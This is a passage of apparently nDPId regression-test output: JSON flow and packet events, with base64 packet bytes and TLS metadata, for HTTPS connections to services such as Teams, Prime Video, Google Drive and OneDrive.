+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482753482,"flow_last_seen":1646482753526,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.66.79","src_port":48140,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.CNN","breed":"Safe","category":"Web"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482772264,"flow_last_seen":1646482772325,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"185.125.190.21","src_port":42884,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.UbuntuONE","breed":"Acceptable","category":"Cloud"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495650748,"flow_last_seen":1646495650748,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495650748,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.113.194.132","src_port":57878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1646495650748,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495650748,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8GIFAAEAGaR3AqAGANHHChOIWAbvSHIRRAAAAAKAC+vCUIQAAAgQFtAQCCApnoF3vAAAAAAEDAwc="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1646495650768,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646495650768,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0H0NAAHQGLmM0ccKEwKgBgAG74hatJvO00hyEUoAS\/\/\/a2QAAAgQFoAEDAwgBAQQC"} +01153{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1646495650768,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646495650768,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItGINAAEAGZyrAqAGANHHChOIWAbvSHIRSrSbztVAYAfbGZQAAFgMBAgABAAH8AwO6eoC9IxGTkdV9vVeJGWk4znzi7kZuVq2WW+Nl\/2Sg0SCU+jy21h8ySE7r\/PfMeW\/+6AejiqSkX1JQLDj\/qy1dewAgSkoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTCgoAAAAAABUAEwAAEHRlYW1zLm9mZmljZS5jb20AFwAA\/wEAAQAACgAKAAjKygAdABcAGAALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAADQASABAEAwgEBAEFAwgFBQEIBgYBABIAAAAzACsAKcrKAAEAAB0AIP361tTnT+5yNMG5uzlpGoadVy4F1\/ksgWxYfkq0hvgPAC0AAgEBACsABwYaGgMEAwMAGwADAgACRGkABQADAmgyWloAAQAAFQDHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495650748,"flow_last_seen":1646495650768,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495650768,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.113.194.132","src_port":57878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.office.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +01176{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":467,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646495650748,"flow_last_seen":1646495650804,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4443,"flow_avg_l4_payload_len":740,"midstream":0,"thread_ts_msec":1646495650804,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.113.194.132","src_port":57878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.office.com","server_names":"teams.office.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"104071bf77c5f0d7bae5f17542ba9428","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Microsoft 
Corporation, CN=Microsoft RSA TLS CA 01","subjectDN":"CN=teams.office.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"27:20:65:85:4C:34:BF:09:F0:25:56:B8:50:A7:4D:38:8C:45:82:80"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":470,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495669804,"flow_last_seen":1646495669804,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495669804,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.185.106","src_port":33664,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1646495669804,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495669804,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8GxZAAEAGN4nAqAGAbIq5aoOAAbvmWe+jAAAAAKAC+vCvxQAAAgQFtAQCCAqEU9WfAAAAAAEDAwc="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1646495669812,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495669812,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8yYIAAPcGEhxsirlqwKgBgAG7g4CERzW35lnvpKAS\/\/\/nPAAAAgQFoAQCCArIqUDThFPVnwEDAwg="} 
+01164{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1646495669817,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646495669817,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5GxhAAEAGNYrAqAGAbIq5aoOAAbvmWe+khEc1uIAYAfZdLwAAAQEICoRT1avIqUDTFgMBAgABAAH8AwN96ffJWUDTazcjPKRqPmlOCDA7EP6e0q+5Knlqzgn4siDXwLeA2RnsV46x7ZH7OaLw+Chjc3EP4ZBJc+xWJC0l1wAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAXABUAABJ3d3cucHJpbWV2aWRlby5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAgGExhTuOW51jqeKeMnZIkirN5TNVDUu2atdTJKyWyDBgAFwBBBNa6zHPDKyGGZ8TLrmG8xe75hAb+vBq5zYOy2EFwzMFPukEZchYJ5onOljVZmDEEihxmPvbweI2eyfjNpyF4jCAAKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":472,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495669804,"flow_last_seen":1646495669817,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495669817,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.185.106","src_port":33664,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonVideo","breed":"Acceptable","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.primevideo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":473,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495669804,"flow_last_seen":1646495669824,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646495669824,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.185.106","src_port":33664,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonVideo","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.primevideo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":474,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495697787,"flow_last_seen":1646495697787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495697787,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.142","src_port":56458,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1646495697787,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495697787,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8TvVAAEAG4RXAqAGAjvq5jtyKAbuisGnHAAAAAKAC+vDU+wAAAgQFtAQCCAq56si5AAAAAAEDAwc="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":475,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1646495697803,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495697803,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8kPwAAHIGrI6O+rmOwKgBgAG73IpV9E4KorBpyKAS\/\/903wAAAgQFlgQCCAoX\/J8euerIuQEDAwg="} +01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1646495697805,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646495697805,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5TvdAAEAG3xbAqAGAjvq5jtyKAbuisGnIVfROC4AYAfb\/+QAAAQEICrnqyMsX\/J8eFgMBAgABAAH8AwMm2R5Ju93q7BO1hUBCbI67+PD2u7\/isSvjCgLKpqok\/yCAWXfAe1hCLkH2e7v9afeyqpqQSwrsncirtbeBJ9H19AAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAVABMAABBkcml2ZS5nb29nbGUuY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIN3ozE7d4X5ID5WvLeFvcVfA+y6MygI54w6MzPaYwOcyABcAQQTFpbayzL1z3QPN8cTTIDg5o4CXfe8\/xuT5UCf9QOlCuSljPogKq5ahl7f7neEgUhdrgF5Z8PWW8a+71cG5NS4HACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":476,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495697787,"flow_last_seen":1646495697805,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495697805,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.142","src_port":56458,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleDrive","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"drive.google.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":477,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495697787,"flow_last_seen":1646495697827,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646495697827,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.142","src_port":56458,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleDrive","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"drive.google.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":478,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495710343,"flow_last_seen":1646495710343,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495710343,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.81.118.91","src_port":33102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1646495710343,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495710343,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8tchAAEAGPx\/AqAGADVF2W4FOAbtTwyfkAAAAAKAC+vBryAAAAgQFtAQCCAom4HXhAAAAAAEDAwc="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":479,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1646495710376,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646495710376,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0mxFAAG4GK94NUXZbwKgBgAG7gU7a1m2vU8Mn5YAS\/\/\/iBwAAAgQFoAEDAwgBAQQC"} 
+01150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":480,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1646495710381,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646495710381,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAIttcpAAEAGPSzAqAGADVF2W4FOAbtTwyfl2tZtsFAYAfZlCgAAFgMBAgABAAH8AwMcPgJU1zrnl+hPKuEgTOmCA8DSxG0x4ZP+nrnS1ukwmSB2tLYK4RsCmYHQ+tv7RzCytXVHC3ipih0buXJEGgMzzAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAARAA8AAAxvbmVkcml2ZS5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAgkhEItWzjEiug\/WBaiPCJVLwOMCFSobcq6gZ3ZM5d7hUAFwBBBKUDUTjCPdZ8Ll1S+z857hqnZsJZ3Vatea3adXIfU3XxBdTrso0nY7PLm8teDMagz\/bdRE3yXoqXxIphrdW4ROsAKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495710343,"flow_last_seen":1646495710381,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495710381,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.81.118.91","src_port":33102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"onedrive.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01315{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":484,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1646495710343,"flow_last_seen":1646495710415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6356,"flow_avg_l4_payload_len":908,"midstream":0,"thread_ts_msec":1646495710415,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.81.118.91","src_port":33102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"onedrive.com","server_names":"onedrive.com,p.sfx.ms,*.live.com,*.live.net,*.skydrive.live.com,*.onedrive.live.com,*.onedrive.com,d.sfx-df.ms,*.odwebb.svc.ms,*.odwebp.svc.ms,*.odwebdf.svc.ms,*.odwebpl.svc.ms","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"67bfe5d15ae567fb35fd7837f0116eec","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01","subjectDN":"CN=onedrive.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"50:2F:33:10:92:AC:27:7B:17:BE:82:68:3B:E2:29:AD:97:41:B7:BB"}} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":487,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495710534,"flow_last_seen":1646495710534,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495710534,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.13","src_port":56836,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1646495710534,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495710534,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8CqVAAEAGNnfAqAGADWsqDd4EAbvOscftAAAAAKAC+vD21AAAAgQFtAQCCArXIg8YAAAAAAEDAwc="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1646495710555,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646495710555,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0VKNAAHUGt4ANayoNwKgBgAG73gT+RZAmzrHH7oAS\/\/9wpwAAAgQFoAEDAwgBAQQC"} 
+01151{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1646495710557,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646495710557,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItCqdAAEAGNITAqAGADWsqDd4EAbvOscfu\/kWQJ1AYAfaM8QAAFgMBAgABAAH8AwNoOd\/HU8dseMv53a0gjDg57feHmv3ZKYt3PSUCEOAz7yDC+9qh9Lsnn2pjQO0NmdEK9+51DwzlDpkQTXJ0hGSXhgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAWABQAABFvbmVkcml2ZS5saXZlLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACAI7FYCMeLngdMxbkPLy3IoQelSFCsyCvetq1oFf6z+UQAXAEEEWlI8xcTn+Mao6N7i2Le6X1KJI9pYZKIE\/2dqJMzsIrHC0C7HZlpYDP5BCM3Qrb983QL8azL17uscE+MtJARpvAArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":489,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495710534,"flow_last_seen":1646495710557,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495710557,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.13","src_port":56836,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.MS_OneDrive","breed":"Acceptable","category":"Cloud"},"tls": 
